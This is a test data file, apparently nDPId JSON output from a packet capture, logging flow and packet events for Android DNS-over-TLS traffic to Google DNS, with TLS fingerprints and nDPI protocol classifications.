00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1592552871852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552871852,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0V5sAAHYGHtYICAQEwKgBnwNVu2A7uJADhSLfzIARAX\/+2gAAAQEICuSDFST\/\/78G"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1592552871941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1592552871941,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAAoAABAAEAGbH3AqAGfCAgEBLtgA1WFIt\/MAAAAAFAEAAC96AAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552878549,"flow_last_seen":1592552878549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552878549,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1592552878549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878549,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8PO5AAEAGL3vAqAGfCAgEBLviA1WhETzJAAAAAKAC\/\/\/ccgAAAgQFtAQCCAoAAAAnAAAAAAEDAwg="}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1592552878562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878562,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8nAYAAHYG2mIICAQEwKgBnwNVu+J3bBxFoRE8yqAS6yB6VAAAAgQFZAQCCAo7E6h3AAAAJwEDAwg="}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1592552878563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552878563,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0PO9AAEAGL4LAqAGfCAgEBLviA1WhETzKd2wcRoAQAVeSlgAAAQEICgAAACw7E6h3"}
00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}}
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}}
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592553007037,"flow_last_seen":1592553007037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592553007037,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1592553007037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007037,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8FgpAAEAGVl\/AqAGfCAgEBLxSA1VGZWurAAAAAKAC\/\/+KUgAAAgQFtAQCCAoAAH2hAAAAAAEDAwg="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1592553007051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007051,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8ScwAAHYGLJ0ICAQEwKgBnwNVvFKvdpW\/RmVrrKAS6yB4FwAAAgQFZAQCCAp\/c2KvAAB9oQEDAwg="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1592553007078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592553007078,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0FgtAAEAGVmbAqAGfCAgEBLxSA1VGZWusr3aVwIAQAVeQUgAAAQEICgAAfa1\/c2Kv"}
00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}}
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}}
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592553007037,"flow_last_seen":1592553007037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592553007037,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1592553007037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007037,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8FgpAAEAGVl\/AqAGfCAgEBLxSA1VGZWurAAAAAKAC\/\/+KUgAAAgQFtAQCCAoAAH2hAAAAAAEDAwg="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1592553007051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007051,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8ScwAAHYGLJ0ICAQEwKgBnwNVvFKvdpW\/RmVrrKAS6yB4FwAAAgQFZAQCCAp\/c2KvAAB9oQEDAwg="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1592553007078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592553007078,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0FgtAAEAGVmbAqAGfCAgEBLxSA1VGZWusr3aVwIAQAVeQUgAAAQEICgAAfa1\/c2Kv"}
00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
